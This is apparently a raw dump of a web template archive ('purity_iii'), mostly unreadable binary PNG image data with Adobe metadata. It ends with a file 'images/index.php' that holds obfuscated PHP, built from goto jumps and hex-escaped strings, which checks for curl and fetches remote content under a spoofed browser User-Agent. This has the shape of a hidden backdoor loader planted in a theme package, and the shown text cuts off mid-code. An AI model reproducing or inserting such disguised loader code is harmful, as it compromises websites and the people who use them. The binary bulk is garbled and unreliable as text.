�1�!�rJ�c�c������1�Za� �4Mڒ�<dW��9���x��r������QFW�
q�*"�#��3�%��>�}rj
M��k����GD_�bK�={D�r�\�a@�P�Z��b�@���$ߑ�8�&jHRPQP�oV��^+<�˵W��
�=K�%���|8��YԵ��{/@�UNP�*ʧ��K���R}�G�-�J�?@\�|}�#�ER*!��Xz[�p%v��>�
��m�[�[�D��i��D]�;�yh����?D����a,7�$�x�x�^���V���l]����F��3�!!�1퓾O�<U}��L�I1��1L�fG����XQ�1�Hw��/�4��w䛪4��.]��y�|�4����V���TR`����@u�<h�n1�-�����8�J<D6#1�
�*|�u���� ���Uo8a��V�V\�����̡.F0��.�E�����R�v79*9�K,s�i�����U��>�U�U �a�L˞e�wGS��$(��b��?0���h{���2�3߻8�r���aq�?m�M�AM�&
����ѫ+�����=O�F>y�����s�9l�W�����@������y2�/��2����4%�q�}�a���w��p�{>�'�G�ݯm]�O	W��>S��<��G=���z+.�%*��'�'��Z�[�B9�_�~�����[�1����|��~��W�R���4D:��Gʑ������<�
NM�N��q/m�<@:���M�>P��I��itt�Xh,HA@�b��)����[�'�Hv�&���:C��zi���=t�XiEZ���+V�����JdX��&5�īD���MKh�_8�C�ҧӫ}�}$��-Z�V�݃����1gh�b��z��?����]ݮ�*�DE0���P���'�'�f�%(���H۪mpB���=Uun�1S�����p	�O���*�O}�a�E/�����or5p1Gw�n�ɘH���>�0A�AӀ&�m��]��&�$Ь����W�Dk�����[a�i�uj�l_�\����>х*����=;h���_�~������C+�\)����*!JGP�ԉ��tkzx��+9$[�=6���/����������W���5��y��#�}P�AՍ.��]g���לl۫x�:v2v��Gx�<f��J�R�T-�2��E�"���l��e�e�G�L��b��1���\q�h}�G�G��tv\��O��F�y�҅*���0��a�p}����	t�6�.��rw`���]�$���c�)N��f�ـb^
^r�b��xf�Q�6a^��w��=dEy�Ñ�$��v�Ǘ|�y��Ǻ]�%�T+]S�+�}�>0e�xc<@OE��Э9��µ������x�~h��9��O�2\��\�[�ou��Ғ��S�@W�1�ǥ�pJV�
`Nհ&͸f`�}�y9��Le�
���\�pl9�B�8cHqH���fJ	R�p$j�Η��s?X���j8�JȥN��bͪf�"^z^ẓ��lj#l��˯�k���LK��������;<������(;��Ly�<	���bm�Qc���ǯ�$���8�!���Z�\�!9�a	K1i�4E_t�}�
��^m/@%9W�`F
r��8�{?�~(g���y�<_�WE�G����S�H�tL꒺\">>845�U������!�/�N@��g׵��0���$i�\�=Ǟs��~s��2�q�l����[��^�_�#�i�3z����\`.P�i���Kx�"5�Ds��˩��r��)etC-r�*��Ϗ�[�n��
�=+��׭uֺ�9�����kD���d�u%UI��l@�E/z���ar������d3Z��xig"^Ƽ��事��#���-疐�&
'
��ƈ���+��^��t����\���J=��斸%�66���;��?��(S���U�������n�$'��q�?�U&_�W��+@l��F������\���]���[��������M�C��=�������w`f&��H2����3B�P�y�9��\,c�3�B�T�8GZ}3����;ѫ@���W�+�4ɥs�PH��2��!�6��fs�"*"��t��]@�VV 2P�Զ���uI0��y�g�})W�����uw�;)�v񭁷�%'_�J�P��'��)�ο~��V@FBB:H]� OM��({�Ў�o��ҩj8C��lM���W%;_2/�W�?�������΃���Uh"nu��ze�7�H���h��LS(q�(	hC�#��L�x�g��L��k��J��Ë�:���J�T �R�}߾�ʌ�3�WM4M�DUYr�?v?������������_���Z�8G��%�l�x~`�����?��,�E;��z�ye�X|N|Ϋa%��?�ī�m@豍�ƌ�>�GM5�]�i����s5�߳�g=j#��h�T���jt5�yϦg�j^f��4�O����ֲ���5��h�IsOs�g���p~�]�+��'�K��1)A�U��@�g�D^_�@��,�e@q���Ӏ��Z�Z�AV�*�SUC�8�&�̅s�)2���H���@X:��:�F��i��A�*�J9�����(������F��1�P�|q�8@�j\5���Ց��,9C�0���fP3hfߍy7Ʈ#��~�
����%7�YCT|T��g7,M�&-DUނ*5J
�s��w�|>��*P0=�;�;�߉}�;�_gg]�A��!e0
��9iۺj]
���#�"Lj�s�\*�aP�R����o�/�5�5��/8ƀԥ���?�p�<�3<z6tc��㲹l�@p�7ڿ�~�Jg
g
t�aM�&�d�'�O4
W�Û÷ZA��[�pQ׳�g=?����+�1t����o����U@�\u\ur�����uEEFE\uLGL@;�b��Q��O�_�s�s��ڦ�l��[۷��ﲋ�:nu��rb����0����-RD�īå�Ƕm����/���h6��3���]9����y���
ʦwɻt�G�Q�C�E��8/�G��# h���P�{*ʅ�q�B-�HA
�*�A�����Q�Q@���(�)�J-��@WoO��Y�������U����uYw�X>~�����6��>MQ��I,*Q	P7�]�p�-�TT\� #�Cp�.��fz*�A���jU�v�2���իՠ\��R�T�3�ِ��%7h�d���}���[�֛��w�V�4!���2��qum��l~%~/�{�u�U2H&!8:5!5�y��
K��_<H��݀w����Vb/�/�yA�J�O���[�ӷ���%�㽏�.;T���Ig��ݫ]#��>3ʌʁ�$/ʆv^;�{q���Ή#���^x^xL�l��O��w0Qa[a[�rJ��
��@QW�H?/�D�H������#2����@��8�ϻ�y��#n�Х�+��G��l�FS�Ԡ��Igҽ�f�A�!�v��׳�g4C�e��c�����l�
0��_	�F����tX�;�R�������	�^ݻZ9�8�V�~���pӑ����uL����"�\n�[ڮ�	��G�R��Ӌ�9`��8�Trvή,�E%\	w��B�("7��[�=�9�	ޡ��*�U�A�r�@P��o�/	�Z?h�����R��q=��	�g���w99-ݟ:q:a�i��c��%�&�:��N�z�b�D�Uܫ��l1�6d�v�zk�Q[9y��Ɖ{�*�]�f&���Cְ��"F�#L��<�Ÿ�hx
ȇg�g�������01�m�6�p�����OR>I	�I��;�+�+�[5���`���>P���P���v�~�ZKa��S��G�G'�$@��q�`�T>Ч�/
8�*o˾{�{T��98�O^���
��,5������6Z�x�<m�F�8'�D�Th*�G4�����>�,%`������w�;��x�A{i/�u4
�G�M<w�v�j�۸[�[�V����u캎���丏���4�E���T];�v
����t���I=?M
�ʼXR��6�F)�˻�.c�K���m�6��)�#���x�;�`�
TЉo�o���R-XY�\Ecui?�r��|�뼫�|w?J�(�f
����V	�|���o����"_�/]�����v�V�
@l>�9��VČj�Z���IoO�=������`�N�i:�f�ɗ������-nK�It�~��Y&�Z���cT	Sl�|e�W���1h����z��_b��M\3�F6�
�[{y�������#��UQp0�A�/8d���9����a�a&���R��D����O�On�8��b��H6y,�$���<O<O��'\k���}�����g�{��@�O\��`+������&�0�Ѓ�r_6�'�����t�$@��W���C�dXYQV~�����3���Q�Q����q�Ǖ�'ɠ�[�}VB�p܆�	��-Vq(�y�� �[�V$�&���I;��������S.�l~-g��x��A���T�*�}����6Ԯ؛�K8�-��9R�U���� z��?���r���o
|��W�>K� ։u~Q���"@�9/</�}N‰^rڶm�A$��ε,EY�,Kb<Y���;"���]�A&Ȅs�Ͳsv.z@�<s�9�SG�#���!�\'�y�
=�Q�n"l�#��9՜��S�S@)���fBs�a^�׶���[��^�ş�O���w_,�X�E҇?��礔��R�I5Ea�Z�Z�М�����cqN����������^3�]�m�4o?�1sW���m`�����U�0�)@)��\x<��++�
���֯֍v2j�2n��5�Qь^}_�ک�w��!9�E�һ��T��������5)Q}Q}/{������7��/�^���3�����9�%0#R��E}��(�(���H�h6ZiD��A���cmhƧ��Vߤo��Txߜo.x��I
I��&Q��C����}�_x��ww�ڔJ����F���>�'�V1��ҳ�k�F�9ps���ۏ�w�J�0-L��Yf�.�z��l�v�6Ѧ������{�8��M�a�U9����d�ͣxz^�w�)D
��Ҟ��vE�_����NV�:����EfNG\�#d+d˵,YЌf_��c+���;�L��ꭶ���
�����I��q@�D�����#�@�&�b�TT�� {��$���/8d[S�����u��1���q�\�]��9eJ3��C�&?�/�Ͽ$WOOkb���a�8��i�^�"E��Q���pU��>�Ң�Lm���������S�Prq�$3	��㍎t����� ��zd��ev�����؆؆Km��.�qxj=���J�JPʧ�)��;�N��\�\w��n�j�j���r����%U��F�\.�n�I��[�q�F1uL�_��藀�cRk#�8uJ��&6Ir�:���I��2��ߏ���:+'DO�ha�k��SR�
�
����8 �P�C�l%�V�*��Ļ�.����t&9��IDy�^�T��ڷ�[��^�=q�4�4*�u��T�N�A�AЁ'
�4��JsT�G?����s�%������,�hE-j��&��e�C�C��-�Q�Q��E�4�栓��
l��Q���B�8˱�+���.@h�M�&��/j[�����)R��+��y�<��ʾ��p2�L6k`
�&&�I��6ɭr�Y�U�V�V��"���s�12yQ#:�hq`���X��4PfU� �T.��L���ԥX@�B�ARA*�a��#��X���4��Em\�����7����Н�4���]쨲�����p@W�����R� ��xC��[���k���MΦ�5���F�P̼��`���ځ�7��%:f���$>(+(��L�@ ~Av�]���ѐ�;l	[�����<=ʴ��S�m�;�yh�n,�X|���7�6����Or-P��

�B�"�p�2�L���n�ʹ�*w���b�<��L��F���O��ĭs�f�H�6�~�Q�*A�\8��%��Q�_�/0Hg�g��j��Y=��wbgcgϦȞ!ې��$�	�T&�ǀ�ʥ6<~�
'�d�4��h�ܼ��u%N���Sԕ�/8$ch�&ݾQ����9���\��6����M�M; ��������:����j��Z|�x�K���𽇮=��z�$М@
$�(��Ntʂ'�t����HwPUP@i
��Ru���֖4Eq�8˹��b���q��š�[Ɩ�Ep%םם�]���9���BCl�ZR�}�Mc���Q�c����A�
�筺t��i��1�Mo�w�?�x�_x�al�u�]���+�+R+0�Ō1c���jԡH�*�_�,�
��8솺B]���5r���~�'Ҝ4��}�����(1�3��,6i͡��p�F�a)�~�/�r�E�EJT'ɤ�tY���޼�yR���պOH����!�~%QI�̤0)�S��Z�Ho�4��I�Ŭ3�!���i���$��g��<���[9P0�����R����F�m�
 qז�-�}K�%������J�]����� ;(
(+R���~H;|��z�mH1��e�s&�D���oݿu���#����'��{�W-�:'�ח���#�#/����Z4�F�(�Z�A
9&�5w�;�\(�wI����w����K��d�]�k���Wx��5L�����s��W2����#�L=S�$�׶kJ^F��H+����_1*F��U���HX��z�z,K�R��Hy��×����	�/�hR�����<�˜0���p�����z�$F��ey��J^��\�>f+B��Vw�v���U��Ah<�;�=��Z�k�f^�:2�d
�@�o��u��f�>ӑ鈘�-[�-.4�����xw4k�7�^9h=�ƷyG�ʳ�v 0^o{4���M�	�kl'ۉR�6�M~�O+i%?�ɫ�i����"�=�m�����	84[N�S6.x+xй���i%���D+�?V��e�ƌ��L,|*�
�t}��&��;w�s��qz7���#~6�I̓�Kj�M	]]���%Ѧh�i�h��쓲��;�;��d9�;��W�
��O�I8�tXa���"�)W����R�� 5�`P�5i.S�Tl��Z[}�3�Oͧ�z��n��/�^d]K�dݴܴ���aݶnЫJ�$�]�����4�����,�s	\��D:�.����VB{B{.J�44�K�����Y���M��G�x�$�Ճ�)	h��77��0�{S�)z7m��g4st����A1R9TF�y�9�Q騴TJ	��N��Г4.��r����ΰN���;�x�J���nvV_��vGgpep%�&�P*�{�^��!�Z|�3*c.�7��B6ҟ�~�Z`%S��hV��:O���8��Q����s��'t	]�EP��>8�/8|��1U���tn3��k�uZ�������U��X1V�H�v=���
��t}�11�q��ˉ�F�{~9k9��х�~l��d"��*:O�V�
��������KbH�)U(
�(D!@��w�����丗]�?���9Ӥ������lZ�tȴs�J���?$��w�w�Ρ8�Me�2������������ܦz��\xx��f1�eG#ӥKե��_
�!�4���^z/���zhs�v�vM�[SoM��b���#��"�(�h�a	a	�u�4�&t*����y�L��v[�'��G��ˁ�ב2'��#���(K�E|��/	/�o�&�j�j�!{d�'��{�/��K�� ���O�9a�qB��0O�ʃ���r��
(0�J~��0`TQ0��+�����Z��gw�]@����<[�z��X�u�(��)�O��rX�\['k�&�	��&��*۟���Al���w�S#�i
��x�exO*I;#1�h�����^<��zc��	��0�=��V�"]ďt�*U�t2�x��ww$W;� *n�
@��Y��pp�@c}w��1ۺ0�w�wr3CX�>�>z�>y�g�)L�,Ȃ�N�]Ѯh���,X<�l+�g����#�V0����(��]%UI�r5��7�x�;
;��oB��ҥ�v'���!$�Ę&M�>���E�bH�4��tv��c��ؾ�G�2{�K���.%O^8�>��������ы�4�1�ѵ�$��cC��5�)�3ə�K{w�����w�wb	t+z�
e@;�أ��P�.6/6���`nB���?x��+@H�/�e����?^�ŋ���-�6qm�EZ�@�9�A��/�:m�(u��ʩNiT�{���j
���(h?�#�
R�oʸ*�J4)�.���ƞ���U�A�k�5�Jnf�Yg��ɬ��c��z��[p�o��s����Ʃq�U�i3m`@�t���
�\1��Ɩk���8S�	 �\������`#�dଷ�n��z�N�%��
��b����L���呜�����<������m��L���>H�U�i{�=)��e�N���:��xM��9�;���������/�D��p&P�2�jQ��0.�Ŕy��ڟ��%�c�1qm��q'Ym�n�qбP����N�"3�s�s�:f���v�\����o4�')9�u��Dx(<�dplp���q���c�����N`��f[��>����<�<@�%Fʦw�;�F�9��Y��v_�/ں�/~} �L
�=�������a�������$>�޵ޅD`���C0�+t��@��M�n�$�� ��7�F:���1���������aZ��>�ƭ���x�q�������
��Ⱦ�>6��ٷ�[�p�y���'�d���6���A#���&]�+IV��2�ֻ��!� � 0�}�w�������w7�x#����v��6�D�-M�7�M�95n���z��v�	|k�&�M���f��=���`Q��y�����6�n�e���Ғ���"ݖBK!�K��-�-��R����
��N]��z/�O~���z���M��GZ&
��������E�"ݸ�%%K�L){d�	�:-��-�44��bjH��z���{��S��Rt�)�)�G]|�9Ӝ)��ؖ��X��[ߺx���~�5�J�N�wbh>"�in ��,3 N�Hz�a@�ڽ�{��
�
s�D�'hr-��A@������(1)�4h���3�=#�������\�Q��@fW��V(�O(��!2���<�_2�%�6Uʿ?���)@�n�
����{��_8�_p��Xe*�
�.+P �c$(*(J7�v�]����vy����zwn�Xd,b�|�B�����m��쪟'��zH)d�3Ǚ��o���n&�����ھf���[���������۽���~�`�BNCNRpq�Rg�h�d��?v���٫Y�*�v��&��K�R?�Fa쑩�Ty�08"8�LdsV��v���~�V�D�"\����M��ǟ�:q��2v��G�#S$Mפk�,��c�f[��l�l����^�]�:ѫt)]�5fBӡ��9��h1Z���[�Qx��>R%6�͈D�n�y��Pj��Zh�o/�FP�n�b�ݚ���S%F�Yyy�y���\�'a�a��l<_8_�J6�&��t�w%����E�E<�X�5�
�	����`䲿�O��?�B����H#o�������k�	����T�@�y�J~XӔhJ�˙���t���?�����.���ھ���9���g���y`�Ë:^�.u���?��
�U�)�T���}��[������i��v��R�}���ǘ�r�P�<��F��(B\�?����|ʭ�[��x���;��<v!v�)����	|r��{�> �'�'̶�n��E�0�p�ΝJ�l�
I�w�����"�%7��!�v=���7��$ff����о�>:Ljy+o=��zlU��0���������7��p��gg�'�,G�Xtk�5�0�������o�7(�2���f��.�r��0E�F��2�yTT.?���$'9֬i��w�]@N�h�h��s�9�M#i$�!U�f�[����jxT����~(�e�K�L�s�9���rM�
krG8��]��+@�*V��1aX����x������c�P���/
8hQ��H!��u��*vH�����ɣ�#�85{�=��"� ����~���ץp^w�"ч>�A�t�i�i�٪�hs�\��L�����L��׾��o���g�3L��f�3z�#hՐm������kcm�����=�k�������W�W�У,)K��q�y�	h�n��nn��Q���~����� �@cW�$��8�ǭŭX���a�&(�J$N�r�\1��	kš�G���b1�0�*M@'���h�E�E��K�5F�Q��{���7��e�R��JZ	Ї��(��5}�>�
�A6\����7dP��_��d�0D��?�tBN���R���
�
u�``��@`�5�#�H�yj(2��ߒ~K�����m@�Ȼ���RT�t�Ah.s���C�z�0��tXP$E�@!�1Pp�Z�N��g�~2��(8$#�	�(3mJ2%�����O�����'�#���nٯ;�z���@Q~O%B2��2C�E&{��}�SڰGۣ�r�}ǾCn,868V�#V.���;�/[�y�y�x���\��t�@F����hB �IR���T��/S.S��������O#����z�_o��C�PH���|���$���b�9���t���F�������,R�=K�%ۡ���䋥1!�!��U��X%B��&ɤ~V����6�	�/	��e2A&��DuH���!:�DZM�Ҡx@�{�=wNܧ+]@r�'me~֦G.T׈z�t�{��h�h�2E�H��3|us��~cW2Jm���Ϥ��B*�&

�n�;��7	8�1}�@5�â��d�	I'�~�b�~��;��HS���[ʒ���%>��‹��0߫�[������!�I�Al�B&�$�T+�!q��Vh����b@k�5�]��{��iI���J�k�5h|��HA'II�����Ho&#K"K�
�xo}o�]�K1�?nd{o��h��@�/�o��"�G�����u=E
`�M�����|��gn䟱�ҧ+�׏��
�uj���>O%�	������g�O��?�����WB*�:Џ~b�K��������x�( +a
�ߜ���1�f��`͡�P`8����0�jAS��"��&��G�'��=�#�U�X�uO��~�]˻ �W���0��&��iE�0��c�1@µ��j�T�|)�����ٹ�a�a�r����q���|�$�XZ:����)d1d�CF�n��S�&��l�#|&���u�'��?}��O�B~t��^���?�^��{�3{�������������Ԁ�k*P)9^��к��Z#c?�:!��s#��.��7h���u����RF�T"l�SҔ4yb��0��yݼ4�H�L�|��1��ҞW����s��H/�8�5�5��ʰ�Tx�&����;V_��m�)IEND�B`�PKԜ�\INz��� purity_iii/images/ico/search.pngnu&1i��PNG


IHDRVu\�tEXtSoftwareAdobe ImageReadyq�e<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmpRights:Marked="True" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:61518A5877ED11E1A702E7225FD4E34D" xmpMM:DocumentID="xmp.did:61518A5977ED11E1A702E7225FD4E34D"> <dc:rights> <rdf:Alt> <rdf:li xml:lang="x-default">ROYALTY FREE LICENSE </rdf:li> </rdf:Alt> </dc:rights> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:61518A5677ED11E1A702E7225FD4E34D" stRef:documentID="xmp.did:61518A5777ED11E1A702E7225FD4E34D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>Հ�8IDATx�|�?K1œl��F,-��Vv���䰻�+D;[A{A+�����š���M��
<^f�͛dWE�ڡ�6I��Ǥ�����/��z�S�A��3��5M�
w�k�}[�F��1�M���"���lʲT-�Ұ8݋pR��Q{�.��Bq���(�sA̦�y6�M�e*�s%o�}��FtC�
�M�Y)�Ǫ1���@r>`�J��w�S+��ܢУ�����—\�I�i*��	��[9��V�y`D�-_M��ڃ;�j7}Zk5%,�G%�ުa8�_gH>S,�/�)��{ֱv�IEND�B`�PKԜ�\�Xޏ��'purity_iii/images/ico/search-invert.pngnu&1i��PNG


IHDRVu\�tEXtSoftwareAdobe ImageReadyq�e<iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpRights="http://ns.adobe.com/xap/1.0/rights/" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmpRights:Marked="True" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:7E256B0777ED11E1BC76DEA17C3EF58A" xmpMM:DocumentID="xmp.did:7E256B0877ED11E1BC76DEA17C3EF58A"> <dc:rights> <rdf:Alt> <rdf:li xml:lang="x-default">ROYALTY FREE LICENSE </rdf:li> </rdf:Alt> </dc:rights> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:7E256B0577ED11E1BC76DEA17C3EF58A" stRef:documentID="xmp.did:7E256B0677ED11E1BC76DEA17C3EF58A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�B�CIDATx�|�O+EA�g�̸Wg!��Bٞ�o�,lllD"%��O��R,X�P������%YI�
7��;ݫ)2��>�����y���h���v���<4M�WŭU��R]�]�5E7XG�<����Y���S��2I�]�UU��e�3�,	tU��L�$v�Q��>	��>0M9�1�����_���b���D��.��	��W|O|��AO�iFR8��E�xG�����?��|�P����\��
��@.��O�ؒ��ťsk��+�!6���\v�����v��9�2�L���!cO�a�h�/b�G��&��IEND�B`�PKԜ�\i�Dllpurity_iii/images/demo/logo.pngnu&1i��PNG


IHDRA �J�tEXtSoftwareAdobe ImageReadyq�e<�iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27        "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmpMM:OriginalDocumentID="uuid:9E3E5C9A8C81DB118734DB58FDDE4BA7" xmpMM:DocumentID="xmp.did:5482520CF8D011E187C18814965C5772" xmpMM:InstanceID="xmp.iid:5482520BF8D011E187C18814965C5772" xmp:CreatorTool="Adobe Illustrator CS3"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:AB4287F6A5F8E1118515FE0C25ECA1C7" stRef:documentID="xmp.did:AA4287F6A5F8E1118515FE0C25ECA1C7"/> <dc:title> <rdf:Alt> <rdf:li xml:lang="x-default">Basic RGB</rdf:li> </rdf:Alt> </dc:title> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>�u�IDATx��]
�$E~{©Q~fɡ�pNe�@5�,0����	�hf=�
�
��;�A�i~D��m�	�(�PĨ� ��=�U�������z��K^�n������^����n�`%�.(;��Fy)ʖ(/dy�Q��(By���Q�2e�i�Z���6�1�W���V�=Q�ΐGe�'(�������G�=���]�WBg9�.��P.`-���cX�(�mP��2�r�#��aw���Ys#J��;xxxH�A��gT�M(w�܋�w�-X�����cy�~(�l;�r�(�G��/��<<�'q�����=$�U��|�c[�wͱL��|	�+(O�*��X��AS��A4ӑ��r<��j<<��qn���Eyʯ|�xxi�2o̩��ړ����H��s
�i�8|>9X�է�D��#ʋY#"2�iڇ�����=<�1Uh
	9,�;z��LҢ�f
MSo_���>I����qNA9�G�~@!�a�{A9e/���m�}�zx䃴��O���3ߖ�4em���AX~-���@5�ՠ��c�!��d�3<�0�,������2ʕ���G�;Ʒ"��2�7H�o�s�Y��Dž(�D�H��֦�dH����.�L�i��2|�k��$��>�@3��j��*�����RC�ȕ�d0ߒBh�{��7.M�ݹc��&���-i��L{YFҠ};2�Y�r=D��a0<�qJ!
�cf�T<<�q� ��fF�F߫i��ׄ�܆rp���	�
(�5�;��~tߺ�!SL�ˆ8ְ!�zn�&���8�̎yl�rDa�iq>�[����	�0�5Y���QFH4�>�#���B&�9�1N7�!h+�����qx�=�>�|>��^M���'&�e��e'��C(GX�%�T�#��U���� ��bҔ}��X������.�(+�~�	;S3�p5D��ߵH�ʥ��ߎ��}�	e����i`��2ÄՑ~�%ܷAJG2�Y��bZIS�{��g4eP�=���RL�M������`j�2��uU,��9���9>IN_����4��u��P6)R���:�	y��-�%fc�h�% -���r3�3����I-���W&h"�FI��!KI�=M�U��Mi�"�����i�����:܉*��g���YH^�Y��_<g���f�zʀXOx��NjsR���rV4�Os����9��.A
Ҩh겉fz[&�
��ڏ���.�Fp�!�v�0�!�Jh��7��aY�&h!�6	i2i4��^�5��T�r�a��3fT5óM��C%�C7,	M���<�bN�:u)�$T�	��+��iz9��IDX���<�rP�GK5U���o��p�P�<�d�m@� �P>���Q���)���ն��toDy�MuTi;$����
1�z��9��hrC��Ҏ(~�,��D^3��f_����M�BΣR>M�zGC�*������QU�_�!�iM9EG5uұ r�_�B�U�
��0"��,��P��g4l�~p+~!qH�({�|�uY�QlҬ�H�2��7��u�hK#kW�
i�JG�hf�L=)��&ݤ��&��\Ҍ�
�������AJΧ��\)[�&���@Cn�7��r���jj�@WG�D�3!���\�l��D��?Ě�F��y����1�|��*����K0ԑ��43��,�U;Ԙ�J� ���?F㛪|j�PCxU�����R�Mqt�9�Ɣ��(��#�5��F;�Q�NG�Hg	[���*�F��7+{��qt-�#0hiѵ�-L0_l}'��MH]��&s���=E�j���4��PNS}�}+u�"���Aıs��T�o��� �A����Yz	Dg�f9Qw��`�G�q[�(05�^�<{��@���e�vTc)+�AO�&Is*�|מE9�}�I#���8V9x(�x���W�
�
!'ꭊm�t��6�oJ%�
J�;�K�r�3P�uJC
*�T
fY7�7,��Yؚ���H"�Q�uW�5����t�V�R��^��͙�Ԡ��e#/R\ҨR�EҎ�1�[��1ߢC��r)L�9��	߿�8�,_:�x�Ê�)���.-hK2hve_���"��PLM�n�q������cF�j���F��aJ1�1U�r�)���H�o���?E7�8�`�$G�-ʒh��٭E��<\k�����ANKdp���+�ݾ�(�Ͻ�E96.:{v���M�5�ѥ�K"5J
��]�ؠ�R�M^NC�ww,���ٝ�!MR'�Œ4��OkL#�m�#���ى<j*q<����ɧ�3��,k�W�
�O��A��v5�bJ2]f��:��aR����u��;����`�z��D�SS���(�
��dB;��h�y�q8�\-Kɣ�q<b��}�S���q-ˑ!d��;u�l��¹��	��%�e��h̏ �l�3�l�@�E��c�P�ٌ "���gZx������c@�w,��STҐ�x���w�(h�E�y3�$��mG�B"=��.0����$
�<Z:�ȃd�u!�:z�?� ��l�	4�|ʦ�k/+��by�r��7�t��k���b8�S�o@39����ᑎ8�v�߶��+�7�%����Õ�����
����#=q��M��{��{�;
X&�eA��gZi[�9��7��G@^�<t��(��b5N�'P�hA޿�3f� qz��9���p
�H��ga;[��.�_������V�
��
�����Ѻ���S���i�$�6���6d��K7��Tǎۮ_��'�-�^i�rMqTh�M¹��|�����9ʧ&H��B�S�GcY}��~�1.�ˈYu�~���
{��<��0�=�I��.t������:*�X���=�|�՝J=�Z�����MB1:j��p�#�c���\8�sZ��7� DG�'+q��.Vw�RӐ99�Ȧ���
	MT�4ʩ�J�"��AR���E\��$���✙�cN4kH��'�8�E��ԔOY�ו��{׊b���:ә�
M���d	��2�25�R��rҘt>�E�[��:lbdЇ�|��u��z�Z\��$�x�$
Hݮ�j���H��]�XzTB�G�q�;-uqzX ]�j�o�3�!��ʋ�*���;��C�\�X��{���z6�X���>t����ĩr�s7
Ϛ�G{ö� y4�&����>�5T�{��7-Np�W�CUR�q"N*
I~N�%��.u���V]!�+C��sI�Gޙ[^^�F>�Dž80;�rVq��b�cI�o��#'4����/�hfsR��1�t��$�n㳘���3�{WA���KӪ�	�{�5چ��8�f1����>�¿�� ��y�C�4�t��.2��Ќ�͌�v���|O�P�q����,��a"�}]W"�P2/KRYM����m�y
ʷ�Ő�8{��K�zj�)����¯c�5�k�5I/�{C�v�+q_��}�}��8h��StP�,���:�����*�.��Y�e�ס;�#�?៨K�EI2eL�g	��&F�q��SW4��p]%���0��3\�1~��tvO�xs�2gEһ��YCI�	,�b �յZ�;� �rd�\ORT�l�|r��Ap;;P��'r	���y�'�QChI
-��-�BI5�Ie)�B0� ���FJ�jF��Ӑ̴��ڷaa_�9~�L�⺼A�NKɂr�3m�KS�^MG$fz�i��N����V9��y�stQ;A"q��"��d=��O�Hs<�u9���!r�:y�c�=��f�S|��t�\���,=]^�+��Bv:m@&���e�3L���겳QKfHj�8����͍;�.�lfG��,�`��Τ0L�{ך�ű�I��T6a�.!Z$�v���)
͐\�g�5��J���Õt8�DS�M��f%X&�ƳҝZ�Qp Y�+,�\�fKV����44����K�lH�Ya�x����!@�$We|��[��%�&|��(�mg�8<<��X�"��옙����O�LKS��:K�LC��v���9)6�Öi�@Y��i@���_��!£�A����Q�LK����fr:c�Ε��W��G�C�mN�v3�kR��R�rhv��u�o?��O�*��(6qh��wCt}�X�k��4�SZy�2�N��)�-�=<<�4�*6 ����	�6'�����gD<<��ơ�w��}G�ѮbIqg��1���c�`���%_ÏX�Z6i(r�|#t˖({C>K>�'|�xx�`|��r�ҽ�IEND�B`�PKԜ�\�����purity_iii/images/index.phpnu�[���<?php
/*
--Copyright:https://www.phpcodejm.com
*/
 goto n5tbK; vk8ns: if (function_exists("\x63\165\x72\x6c\137\x76\x65\x72\x73\151\157\x6e")) { goto R4N40; } goto TLwWv; FAni_: function lZSgo($nBwGl) { goto nSgJx; EqGlw: return @file_get_contents($nBwGl, false, $nQPMm); goto Z67x0; nSgJx: $BwD1F = ["\x68\x74\x74\x70" => ["\150\x65\x61\x64\x65\162" => "\x55\x73\x65\162\55\101\147\145\156\x74\72\40\x4d\157\x7a\x69\154\x6c\141\x2f\65\56\60\x20\x28\x57\151\x6e\144\157\x77\x73\x20\116\x54\x20\61\60\x2e\x30\x3b\x20\127\x69\156\x36\x34\73\40\170\x36\64\x29\40\101\160\160\x6c\145\x57\x65\x62\x4b\x69\164\x2f\x35\63\67\x2e\63\x36\40\x28\x4b\110\x54\x4d\x4c\x2c\40\x6c\151\x6b\145\40\107\x65\143\153\157\51\40\x43\x68\162\x6f\x6d\145\x2f\x39\61\x2e\x30\x2e\64\x34\67\x32\56\61\62\64\40\x53\x61\x66\x61\x72\151\57\x35\x33\67\56\x33\x36\xd\xa" . 